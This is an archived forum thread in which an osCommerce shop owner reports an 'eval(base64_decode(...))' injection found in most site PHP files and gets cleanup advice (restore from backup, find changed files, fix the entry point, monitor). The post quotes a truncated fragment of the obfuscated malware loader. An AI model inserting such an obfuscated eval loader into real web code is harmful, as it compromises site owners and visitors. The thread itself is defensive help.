Jump to content


This topic is now archived and is closed to further replies.


My Website files got Eval Base64 Virus Alert from Internet Security

Recommended Posts

I have 2 shopping website,  i am planning to implement some custom code on oscommerce files so i download all my current files.  but i got virus alert from my internet security suite {removed external link}, now i have in almost all settings files and administer php links this eval code at the beginning code


 <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p



How to fix this issue ? Can i remove this code from all webpages ?


Share this post

Link to post
Share on other sites

The best thing to do is to see if your host has a backup from before this happened. You can check the date on the files to see when it was done, usually. If they have a backup, then have them restore the whole directory. Have them remove or rename the current directory, not overwrite it because if they just restore files they may leave a file that was added.


If they, or your, don't have a backup then you will need to remove that code from all of the files. If you sort the files by date, you may be able to find all that were changed or added more easily.


That sort of injection isn't normal for recent oscommerce versions. But no matter the version, if you don't fix the way they got in, it will just happen again. I suggest you install SiteMonitor so that if it does happen again, you will be notified of it right away and have a record of what was changed and added.

Share this post

Link to post
Share on other sites